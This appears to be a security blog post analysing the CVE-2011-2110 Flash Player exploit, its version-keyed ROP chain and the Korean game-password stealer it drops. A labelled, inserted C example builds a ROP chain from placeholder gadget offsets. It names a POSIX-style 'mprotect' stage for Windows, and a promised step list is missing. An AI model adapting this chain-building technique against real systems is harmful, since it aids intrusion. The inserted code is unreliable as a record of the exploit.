On June 14, Adobe released updates and a security bulletin (APSB11-18) referencing attacks against Adobe Flash Player versions 10.3.181.23 and earlier. The attacks were observed hosted on web pages serving malformed SWF files. We spent some time analyzing this Flash Player vulnerability (tracked as CVE-2011-2110) and are providing some technical details of the in-the-wild exploit.
The Shellcode
The following steps describe how the SWF constructs the shellcode:
Details of the exploitation process:
Unlike many other SWF exploits, this one does not use a heap spray. Instead it uses a three-stage ROP-based attack, which can be described as follows:
Figure 1: ROP address adjustment according to Flash version and container type
The unique thing about this malware is that it constructs its shellcode in a version-specific way. Rather than using a single static shellcode, it builds the chain according to the Flash Player version and the type of container holding the SWF file (see Figure 1 above), and adjusts the ROP gadget addresses accordingly (see Figure 2 below). Every gadget address lies inside Flash Player's own DLL, which makes the exploit very stable: no probabilistic heap layout is needed, and the chain only runs on builds whose gadget addresses are known. So far we have seen the malware targeting versions 10.3.181.14, 10.3.181.22 and 10.3.181.23.
Figure 2: The dynamically built shellcode based on Flash Player version
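The mechanism the figures illustrate, a gadget table keyed by Flash Player version and container type that is rebased into an absolute ROP chain at runtime, is shown below as an added example. This is not code from the exploit or from the post: the container labels (ActiveX versus NPAPI plugin), the fixed module base, and every gadget offset are constructed placeholders, and the pivot/protect/jump layout is a common three-stage shape assumed here because the post does not detail the stages.

```c
/*
 * Added example (not the exploit's code): version-keyed selection of ROP
 * gadget addresses, mirroring the behaviour described in the post.
 * All offsets, base addresses and container labels are constructed
 * placeholders for illustration, not locations in any real Flash build.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed container types; the post only says the choice depends on the
 * container holding the SWF, so ActiveX vs. NPAPI plugin is an assumption. */
enum container { CONTAINER_ACTIVEX = 0, CONTAINER_PLUGIN = 1 };

/* Gadgets are stored as offsets from the Flash module's base so one table
 * row describes one build; the chain is rebased to absolute addresses when
 * it is built. Stage labels follow an assumed three-stage layout (pivot,
 * make the payload executable, jump to it). */
struct gadget_set {
    const char     *version;         /* Flash Player version seen at runtime */
    enum container  container;
    uint32_t        module_base;     /* assumed fixed load address of the module */
    uint32_t        stage1_pivot;    /* e.g. xchg eax,esp ; ret */
    uint32_t        pop2_ret;        /* pop reg ; pop reg ; ret, loads two arguments */
    uint32_t        stage2_mprotect; /* gadget calling a "make executable" API */
    uint32_t        stage3_jump;     /* jump to the shellcode address */
};

/* Constructed table: one row per (version, container) pair the chain supports,
 * covering the three 10.3.181.x builds named in the post. */
static const struct gadget_set gadget_table[] = {
    { "10.3.181.14", CONTAINER_ACTIVEX, 0x10000000u, 0x00012a10u, 0x00011b02u, 0x00046c00u, 0x0000a7d0u },
    { "10.3.181.14", CONTAINER_PLUGIN,  0x10000000u, 0x00012b44u, 0x00011c36u, 0x00046d54u, 0x0000a8e4u },
    { "10.3.181.22", CONTAINER_ACTIVEX, 0x10000000u, 0x00012a2cu, 0x00011b1eu, 0x00046c30u, 0x0000a7f4u },
    { "10.3.181.22", CONTAINER_PLUGIN,  0x10000000u, 0x00012b60u, 0x00011c52u, 0x00046d84u, 0x0000a908u },
    { "10.3.181.23", CONTAINER_ACTIVEX, 0x10000000u, 0x00012a2cu, 0x00011b1eu, 0x00046c30u, 0x0000a7f4u },
    { "10.3.181.23", CONTAINER_PLUGIN,  0x10000000u, 0x00012b60u, 0x00011c52u, 0x00046d84u, 0x0000a908u },
};

/* Look up the gadget set for the runtime (version, container) pair.
 * Returns NULL for builds the table does not cover: a version-specific
 * chain of this kind bails out rather than guess addresses. */
const struct gadget_set *select_gadgets(const char *version, enum container c)
{
    size_t n = sizeof gadget_table / sizeof gadget_table[0];
    for (size_t i = 0; i < n; i++) {
        if (gadget_table[i].container == c &&
            strcmp(gadget_table[i].version, version) == 0)
            return &gadget_table[i];
    }
    return NULL;
}

/* Rebase the offsets and lay the chain out as it would sit on the stack
 * after the pivot. Returns the number of 32-bit slots written, or 0 if
 * there is no gadget set or the buffer is too small. */
size_t build_chain(const struct gadget_set *g, uint32_t shellcode_addr,
                   uint32_t shellcode_len, uint32_t out[], size_t cap)
{
    if (!g || cap < 6) return 0;
    size_t k = 0;
    out[k++] = g->module_base + g->stage1_pivot;     /* stage 1: pivot to the chain */
    out[k++] = g->module_base + g->pop2_ret;         /* load the two arguments below */
    out[k++] = shellcode_addr;                       /* region to make executable */
    out[k++] = shellcode_len;                        /* size of that region */
    out[k++] = g->module_base + g->stage2_mprotect;  /* stage 2: change protection */
    out[k++] = g->module_base + g->stage3_jump;      /* stage 3: run the payload */
    return k;
}

int main(void)
{
    uint32_t chain[8];
    const struct gadget_set *g = select_gadgets("10.3.181.23", CONTAINER_PLUGIN);
    size_t n = build_chain(g, 0x0c0c0c0cu, 0x1000u, chain, 8);
    for (size_t i = 0; i < n; i++)
        printf("slot %zu: 0x%08x\n", i, chain[i]);
    if (!select_gadgets("10.3.183.5", CONTAINER_PLUGIN))
        puts("10.3.183.5: no gadget set, chain would not be built");
    return 0;
}
```

The lookup fails closed: a build outside the table yields no chain at all, which is consistent with the exploit only firing on the three versions it was written for, and explains why the campaign is stable rather than crashing on untested builds.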
The downloaded PE file
The PE file downloaded and executed by the shellcode is detected as PWS:Win32/OnLineGames.ZDV (SHA1: 4a13a14523fe95817cc53c75f86ee4af36ee2464), a password stealer that specifically targets the Korean online games community. This focus on Korea is also evident in our telemetry from protected Microsoft Security Essentials and Forefront customers: aside from one day (June 22) when attacks increased in Europe and Russia, attack attempts have been reported predominantly from computers in Korea.
Figure 3: MMPC Telemetry on CVE-2011-2110 Attack Attempts during June 17 – 30, 2011
-- Jeong Wook Oh, Chun Feng & Marian Radu